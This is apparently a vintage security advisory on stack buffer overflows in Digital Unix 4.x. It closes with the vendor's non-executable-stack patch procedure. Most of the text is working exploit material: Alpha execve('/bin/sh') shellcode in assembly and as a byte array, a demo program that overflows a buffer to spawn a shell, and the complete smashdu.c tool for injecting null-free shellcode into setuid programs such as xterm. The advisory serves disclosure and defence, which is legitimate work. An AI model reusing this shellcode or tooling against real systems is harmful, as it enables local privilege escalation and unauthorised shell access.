COMMAND

    buffer overflows

SYSTEMS AFFECTED

    Digital Unix 4.x

PROBLEM

    By the end of January 1999, Lamont Granquist made public
    something many people believed impossible: a buffer overflow on
    DU.  While 3.x may keep the title of unbreakable OS regarding
    buffer overflows, 4.x lost it.  Previously Digital Unix had been
    relatively immune to buffer overflow attacks due to the lack of
    an executable stack in the 3.x versions.  For the 4.0 versions
    the stack was made executable -- likely for JIT compilers and
    maybe programs that need GCC-like trampolines.  To see Lamont's
    post, see 'at' and 'mh' in the Digital section.  This text
    follows Seth Michael McGann's posting, which describes his work
    on this subject.

    Seth had been working on Dec Unix shellcode and more or less
    abandoned the project after making a test exploit using an
    executable heap buffer.  Never believe anyone, always test it
    yourself.  Here is what he came up with; it includes an asm
    listing of the shellcode as well as a demo exploit.  You will
    notice the large number of zeros; in fact the PAL code for a
    syscall is 0x00000083.  So we are not going to sidestep the
    problem of NULL removal as easily as we can on x86.  One
    suggestion is the technique used in several IMAP exploits, where
    the shellcode is encoded and then decoded.  At any rate, this
    should get you started and let you see for yourself what needs
    to be done.  Shellcode in asm:

    .globl main
    .ent main
    main:
    jmp egg         # find out where we are
    backhere:
    mov $26,$30
    mov  $26 , $16
    mov  $26, $1      # make a copy of ra
    addq $1, 0x08, $1 # offset 8
    mov  $1 , $17     # points at argv
    addq $1, 0x04, $1 # offset 4 more
    stq  $26, 8($30)
    stq  $31,  16($30)
    mov  0x0, $18      # clear the third argument (envp)
    addq $31,0x3b,$0   # move in the syscall number (execve in this case)
    .quad 0x00000083   # do the deed

    egg:
    bsr backhere
    .ascii "/bin/sh\0"
    .quad 0     # pointer to /bin/sh  (argv[0])
    .quad 0     # pointer to NULL
    .quad 0     # this is unnecessary, but i left it in for debug
    .quad 0
    .end

    Simple, eh?  You'll notice all the common techniques used in this
    egg.  This would be suitable for a bcopy overflow (iquery,
    bootpd...); just add the dup's and you're set.  When you assemble
    this with as you will need to strip off the headers and insert
    the code into the stack for it to work, lest it crash by
    modifying the text segment.  Here is an example loaded with the
    shellcode.  Test program:

    char sc[]= { 0x0c, 0x00, 0xe0, 0xd3,0x01, 0x04, 0x5a, 0x47,
                 0x1e, 0x04, 0x5a, 0x47,0x01, 0x14, 0x21, 0x40,
                 0x11, 0x04, 0x21, 0x44,0x10, 0x04, 0x5a, 0x47,
                 0x08, 0x00, 0x5e, 0xB7,0x01, 0x94, 0x20, 0x40,
                 0x10, 0x00, 0xfe, 0xb7,0x00, 0x74, 0xe7, 0x43,
                 0x12, 0x04, 0xff, 0x47,0x83, 0x00, 0x00, 0x00,
                 0x1f, 0x04, 0xff, 0x47,0xF3, 0xFf, 0x5F, 0xD3,
                 '/', 'b','i','n','/','s','h',0x00,
                 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
                 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
                 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

    main(int argc,char **argv) {
    leaf();
    }

    leaf(){
    char blow[512];
    int i;
    unsigned long addr;

    addr=(unsigned long)blow;

    for(i=0;i<1024;i+=8) {
    blow[i]=addr & 0xFF;
    blow[i+1]=(addr >> 8) & 0xFF;
    blow[i+2]=(addr >> 16) & 0xFF;
    blow[i+3]=(addr >> 24) & 0xFF;
    blow[i+4]=(addr >> 32) & 0xFF;
    blow[i+5]=(addr >> 40) & 0xFF;
    blow[i+6]=(addr >> 48) & 0xFF;
    blow[i+7]=(addr >> 56) & 0xFF;
    }
    bcopy(sc,blow,sizeof(sc));
    }

    Simply compile and run, and you will receive a shell.  On Alphas
    you need to return from the parent of the overflowing function
    to get any effect.  In this case leaf() overflows and on exit
    from main() we get our shell.  On another note, if you have a
    standard string overflow you will need to be wary of NULLs.
    This shellcode can easily be converted to have no zero bytes
    using an encoding routine.  A bigger problem is the return
    address, which almost certainly will have nulls.  Since this is
    a little-endian architecture, the least significant bytes come
    first and we can fill those in and be done with it.  A side
    effect is that we have to guess the offset exactly, or no go.
    Anyway, this has been posted before it becomes obsolete.  Maybe
    someone will get something out of it while waiting for better
    code.
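
    To make the return-address remark concrete, here is a minimal
    sketch (not part of either original posting) that lays a 64-bit
    value out in little-endian order and counts how many bytes come
    before the first zero byte.  The helper names le64_bytes() and
    bytes_before_first_nul() are made up for this illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Lay out a 64-bit value in little-endian byte order.  Shifts are
   used so the result does not depend on the host's endianness. */
static void le64_bytes(uint64_t v, unsigned char out[8])
{
    size_t i;

    for (i = 0; i < 8; i++)
        out[i] = (unsigned char)((v >> (8 * i)) & 0xFF);
}

/* Count the bytes that precede the first zero byte in the
   little-endian layout of v, i.e. how much of the value a
   NUL-terminated string copy could carry. */
static size_t bytes_before_first_nul(uint64_t v)
{
    unsigned char b[8];
    size_t n = 0;

    le64_bytes(v, b);
    while (n < 8 && b[n] != 0)
        n++;
    return n;
}
```

    For the default ra used later in this text, 0x11fffff24, the
    layout is 24 ff ff 1f 01 00 00 00, so the five low-order bytes
    are non-zero and only the three high-order bytes are zero.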

    And speaking of other people's code, here is Lamont's work.  The
    following example code should be a pretty decent toolkit for
    doing buffer overruns on DU4.0x.  The buffer overflow itself is
    pretty kludgy and is contained in the genshellcode() function
    and in the rawcode[] buffer.  The entry point to the shellcode
    is in the middle of the shellcode, *not* at the beginning, so
    that you can branch backwards (the offset is negative, e.g.
    0xffed, instead of positive, e.g. 0x0038), which avoids a zero
    in the shellcode.  Therefore genshellcode() has to be a little
    more convoluted and has to modify the ending branch instruction.

    The shellcode itself is a little bit nutty in order to avoid all
    those nulls.  Avoiding nulls is a real pain.  The call_pal
    instruction (part of exec("/bin/sh")) has a bunch of unavoidable
    nulls and the "/bin/sh" itself has an unavoidable null -- the
    xors are for taking care of things like that.  It also uses
    offsets of about 0x140 to avoid nulls in the first byte of the
    offset.  This could probably be done better and tighter.  Right
    now it must be at least 80 bytes in length.

    The shellcode gets dumped into an environment variable,
    similarly to Aleph1's code in his Phrack article.  You can also
    specify command line arguments of the form
    '-e "DISPLAY=foo:0.0"' (for example) if you need additional
    ones.  The program then takes the shellcodesize (size on the
    heap where the shellcode gets stuck -- 80 is the minimum -- this
    is not the buffer that gets overflowed -- 1024 is probably a
    good value), then the padding (a value from 0..7 which adjusts
    the shellcode so that it is on a 64-bit word boundary, since env
    variables are not aligned at all), then the size of the buffer
    overflow.

    The buffer overflow currently fills the buffer with 'a' (0x61)
    characters followed by the ra.  The ra can be changed with the
    '-r' argument -- remember to avoid nulls in the ra.  Then you
    simply give command line arguments as you normally would to run
    the program you are trying to overflow, where a single %e will
    be substituted by the buffer overflow.  Ex:

        ./smashdu -e "DISPLAY=foo:0.0" 1024 0 1501 /usr/bin/X11/xterm -fg %e

    (which nearly works -- I can't figure out why -- 1501 is too
    long while 1500 is too short -- Digital Unix 4.0B, unpatched).
    The code:

    /* smashdu.c
       generic buffer overflow C 'script' for DU4.x (4.0B, 4.0D, ???)
       Lamont Granquist
       lamontg@hitl.washington.edu
       lamontg@u.washington.edu
       Tue Dec  1 11:22:03 PST 1998

       gcc -o smashdu smashdu.c */

    #define MAXENV 30
    #define MAXARG 30

    #include <unistd.h>
    #include <stdlib.h>
    #include <strings.h>
    #include <stdio.h>

    /* shellcode = 80 bytes.  as the entry to this shellcode is at offset+72 bytes
       it cannot be simply padded with nops prior to the shellcode.  */

    int rawcode[] = {
      0x2230fec4,              /* subq $16,0x13c,$17       */
      0x47ff0412,              /* clr $18                  */
      0x42509532,              /* subq $18, 0x84           */
      0x239fffff,              /* xor $18, 0xffffffff, $18 */
      0x4b84169c,
      0x465c0812,
      0xb2510134,              /* stl $18, 0x134($17)      */
      0x265cff98,              /* lda $18, 0xff978cd0      */
      0x22528cd1,
      0x465c0812,              /* xor $18, 0xffffffff, $18 */
      0xb2510140,              /* stl $18, 0x140($17)      */
      0xb6110148,              /* stq $16,0x148($17)       */
      0xb7f10150,              /* stq $31,0x150($17)       */
      0x22310148,              /* addq $17,0x148,$17       */
      0x225f013a,              /* ldil $18,0x13a           */
      0x425ff520,              /* subq $18,0xff,$0         */
      0x47ff0412,              /* clr $18                  */
      0xffffffff,              /* call_pal 0x83            */
      0xd21fffed,              /* bsr $16,$l1    ENTRY     */
      0x6e69622f,              /* .ascii "/bin"            */
                               /* .ascii "/sh\0" is generated */
    };

    int nop           = 0x47ff041f;
    int shellcodesize = 0;
    int padding       = 0;
    int overflowsize  = 0;
    long retaddr      = 0x11fffff24;


    void usage(void) {
      fprintf(stderr, "smashdu [-e <env>] [-r <ra>] ");
      fprintf(stderr, "shellsize pad bufsize <cmdargs>\n");
      fprintf(stderr, "  -e: add a variable to the environment\n");
      fprintf(stderr, "  -r: change ra from default 0x11fffff24\n");
      fprintf(stderr, "  shellsize: size of shellcode on the heap\n");
      fprintf(stderr, "  pad: padding to align the shellcode correctly\n");
      fprintf(stderr, "  bufsize: size of the buffer overflow on the stack\n");
      fprintf(stderr, "  cmdargs: %%e will be replaced by buffer overflow\n");
      fprintf(stderr, "ex: smashdu -e \"DISPLAY=foo:0.0\" 1024 2 888 ");
      fprintf(stderr, "/foo/bar %%e\n");
      exit(-1);
    }

    /* this handles generation of shellcode of the appropriate size and with
       appropriate padding bytes for alignment.  the padding argument should
       typically only be 0,1,2,3 and the routine is "nice" in that if you feed
       it the size of your malloc()'d buffer it should prevent overrunning it
       by automatically adjusting the shellcode size downwards. */


    int genshellcode(char *shellcode, int size, int padding) {
      int i, s, n;
      char *rp;
      char *sp;
      char *np;

      rp = (char *)rawcode;
      sp = (char *)shellcode;
      np = (char *)&nop;
      s  = size;

      if (size < (80 + padding))  {
        fprintf(stderr, "cannot generate shellcode that small: %d bytes, ", size);
        fprintf(stderr, "with %d padding\n", padding);
        exit(-1);
      }

    /* first we pad */
      for(i=0;i<padding;i++) {
        *sp = 0x6e;
        sp++;
        s--;
      }

    /* then we copy over the first 72 bytes of the shellcode */
      for(i=0;i<72;i++) {
        *sp = rp[i];
        sp++;
        s--;
      }

      if (s % 4 != 0) {
        n = s % 4;
        s -= n;
        printf("shellcode truncated to %d bytes\n", size - n);
      }

    /* then we add the nops */
      for(i=0; s > 8; s--, i++) {
        *sp = np[i % 4];
        sp++;
      }
      n = i / 4;       /* n == number of nops */

    /* then we add the tail 2 instructions */
      for(i=0; i < 8; i++) {
        *sp = rp[i+72];
        if(i==0)   /* here we handle modifying the branch instruction */
          *sp -= n;
        *sp++;
      }

    }

    int main(argc, argv)
      int   argc;
      char *argv[];
    {
      char *badargs[MAXARG];
      char *badenv[MAXENV];
      long  i, *ip, p;
      char *cp, *ocp;
      int   c, env_idx, overflow_idx;

      env_idx = 0;

      while ((c = getopt(argc, argv, "e:r:")) != EOF) {
        switch (c) {
        case 'e':                         /* add an env variable */
          badenv[env_idx++] = optarg;
          if (env_idx >= MAXENV - 2) {
            fprintf(stderr, "too many envs, ");
            fprintf(stderr, "try increasing MAXENV and recompiling\n");
            exit(-1);
          }
          break;
        case 'r':                         /* change default ra */
          sscanf(optarg, "%x", &retaddr);
          break;
        default:
          usage();
          /* NOTREACHED */
        }
      }

      if (argc - optind < 4) {
        usage();
      }

      shellcodesize = atoi(argv[optind++]);
      padding       = atoi(argv[optind++]);
      overflowsize  = atoi(argv[optind++]);

      printf("using %d %d %d\n", shellcodesize, padding, overflowsize);

    /* copy the args over from argv[] into badargs[] */
      for(i=0;i<29;i++) {
        if (strncmp(argv[optind], "%e", 3) == 0) {  /* %e gets the shellcode */
          badargs[i] = malloc(overflowsize);
          overflow_idx = i;
          optind++;
        } else {
          badargs[i] = argv[optind++];
        }
        if (optind >= argc) {
          i++;
          break;
        }
      }

      badargs[i] = NULL;

      if (optind < argc) {
        fprintf(stderr, "too many args, try increasing MAXARG and recompiling\n");
        exit(-1);
      }

      printf("putting overflow code into argv[%d]\n", overflow_idx);

      cp = badargs[overflow_idx];
      for(i=0;i<overflowsize-8;i++) {
        *cp = 0x61;
        cp++;
      }

      ocp = (char *) &retaddr;

      for(i=0;i<8;i++) {
        cp[i] = ocp[i];
      }

    /* here is where we actually shovel the shellcode into the environment */
      badenv[env_idx] = malloc(1024);
      genshellcode(badenv[env_idx++],shellcodesize,padding);
      badenv[env_idx] = NULL;

    /* and now we call our program with the hostile args */
      execve(badargs[0], badargs, badenv);

    }
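
    The pad argument described above is plain alignment arithmetic.
    As a rough sketch, assuming the start address of the environment
    string were known (in practice it is found by trial), the number
    of pad bytes needed to reach the next 64-bit boundary could be
    computed as follows.  The helper name pad_for_alignment() is
    hypothetical and does not appear in smashdu.c.

```c
#include <stdint.h>

/* Return the number of pad bytes needed to move addr up to the next
   multiple of align.  align must be a power of two (8 for a 64-bit
   word boundary).  Returns 0 if addr is already aligned. */
static unsigned pad_for_alignment(uint64_t addr, unsigned align)
{
    uint64_t mask = (uint64_t)align - 1;

    return (unsigned)((align - (addr & mask)) & mask);
}
```

    With align set to 8 the result always falls in the range 0..7,
    matching the range given for the pad argument.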

SOLUTION

    If you are running Digital Unix, you have a problem now.  Keep
    your system up to date.  Digital Engineering has developed a
    non-exec-stack patch for Digital Unix 4.0D.  It must be applied
    *ONLY* to Digital Unix 4.0D with the BL11 jumbo patch kit #3
    installed.  It is not known at this time whether Compaq plans on
    incorporating this into 4.0E or into any future or prior
    releases.  BL11/PK3 for DU4.0D can be obtained at:

        ftp://ftp.service.digital.com/public/dunix/v4.0d/duv40das00003-19990208.tar

    After installing this patch kit download the following two files:

        ftp://xfer.service.digital.com/to_customer/proc.mod
        ftp://xfer.service.digital.com/to_customer/std_kern.mod

    Then do something  of this nature  to move them  into /sys/BINARY,
    while preserving  the original  files (you'll  probably need  them
    for future patch kits):

        mv /sys/BINARY/proc.mod /sys/BINARY/proc.mod.orig
        mv /sys/BINARY/std_kern.mod /sys/BINARY/std_kern.mod.orig
        mv proc.mod /sys/BINARY
        mv std_kern.mod /sys/BINARY

    Rebuild  your   kernel  (cd   /sys/conf/<WHATEVER>;  doconfig -c
    <WHATEVER>), reinstall  your kernel  and reboot.   The stack  will
    now be non-executable by default.  To change this add the line:

        proc:
                executable_stack = 1

    to /etc/sysconfigtab - there is no need to reboot.  Alternatively,
    as root issue the command:

        # sysconfig -r proc executable_stack=1

    Set this value back to zero if you want non-exec-stack again.
    Be aware that this patch may cause certain programs (like
    compilers) to break, so it may not be appropriate for
    workstations that see a lot of development work.  It will
    probably be a good thing for servers and general-access machines
    though.  And remember, *ONLY* for DU4.0D with BL11.